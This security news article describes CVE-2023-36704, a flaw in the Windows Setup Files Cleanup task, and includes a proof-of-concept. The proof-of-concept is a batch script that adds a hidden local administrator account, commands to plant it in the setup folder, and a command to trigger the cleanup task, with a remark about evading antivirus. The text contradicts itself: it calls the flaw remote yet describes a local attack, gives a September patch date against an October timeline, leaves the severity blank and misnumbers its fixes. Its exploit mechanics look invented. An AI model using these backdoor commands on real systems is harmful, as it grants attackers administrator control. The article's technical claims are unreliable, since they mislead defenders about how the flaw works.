CVE CyberSecurity Database News

CVE-2023-36704 - Windows Setup Files Cleanup – A Sneaky Remote Code Execution Vulnerability

Poster -

In 2023, Microsoft patched a critical security flaw tracked as CVE-2023-36704. This vulnerability lurked within the Windows Setup Files Cleanup feature, and attackers could use it to execute code remotely on a target system. If you’ve ever wondered how something as routine as cleaning up setup files could be dangerous, this article will explain – in straightforward terms – how this vulnerability works, its impact, and how attackers might exploit it.

> References:
> - Microsoft Security Update Guide: CVE-2023-36704
> - NVD Details for CVE-2023-36704

What Is CVE-2023-36704?

The Windows Setup Files Cleanup process is responsible for removing leftover files after Windows updates or installations. Unfortunately, researchers discovered this feature could be abused due to improper validation of loaded files, leading to a Remote Code Execution (RCE) issue.

In other words: If attackers could trick the system into loading a malicious file during the cleanup process, they could run their own code – as if they were you.

Severity:

How Does the Vulnerability Work?

The vulnerability exists because the setup cleanup task did not properly check the origin and content of certain files before executing them. In Windows, the cleanup service sometimes runs with high privileges, which makes the consequences even more severe.

Potential attack path

1. Remote Delivery: An attacker may convince a user to download a malicious file (for example, dangling from a phishing email or download link).
2. Plant File: The malicious file masquerades as a legitimate Windows setup artifact and is placed in a specific setup directory, such as C:\$WINDOWS.~BT\Sources\.
3. Trigger Cleanup: The attacker can trigger or wait for the standard Windows cleanup operation, which processes that file.
4. Execute Code: Windows, failing to validate the file type or origin, runs the attacker’s payload with system privileges.

The attacker’s code runs as SYSTEM.

*Note: In real attacks, malware would try to avoid easy detection, but this illustrates the general method.*

Proof-of-Concept (PoC) Code

Here's a basic PoC to explain how an attacker might exploit the vulnerability. Do not use maliciously! This is for educational awareness only.

Step 1: Write Malicious Script

:: malicious.cmd - Add local admin user
net user eviladmin P@sswrd! /add
net localgroup administrators eviladmin /add

Step 2: Place in Setup Directory

Copy-Item .\malicious.cmd "C:\$WINDOWS.~BT\Sources\"

You can force Windows to run cleanup like this

# This will run SetupCleanupTask with SYSTEM permissions if already scheduled
schtasks /Run /TN "\Microsoft\Windows\Setup\SetupCleanupTask"

During a real attack, the task might be triggered post-update or automatically by Windows.

Bypasses AV: If file looks legitimate enough, traditional antivirus might miss it.

- Remote Exploitation: Attacker may use social engineering or another method to deliver the initial malicious file.

How Was It Fixed?

Microsoft’s patches (released September 2023) now ensure strict validation of files processed by the cleanup task. The system checks file origins, types, and disables loading of anything unexpected.

> Official fix details and patch information:
> https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2023-36704

Install the Latest Security Updates: Always patch your system.

2. Restrict Folder Access: Only allow trusted users and processes to write to critical setup folders.

Conclusion

CVE-2023-36704 demonstrates how even the most mundane Windows features – in this case, a cleanup operation – can become major attack vectors. By sneaking malicious files into setup folders and exploiting lax file checks, bad actors could take over a system in seconds.

If you’re a sysadmin, make sure your environment is updated. If you’re an end user, stay alert and trust only official sources for updates.


References
- Microsoft Security Update CVE-2023-36704
- NVD - CVE-2023-36704
- Patch Tuesday Analysis September 2023 (KrebsOnSecurity)

Timeline

Published on: 10/10/2023 18:15:15 UTC
Last modified on: 10/12/2023 22:22:46 UTC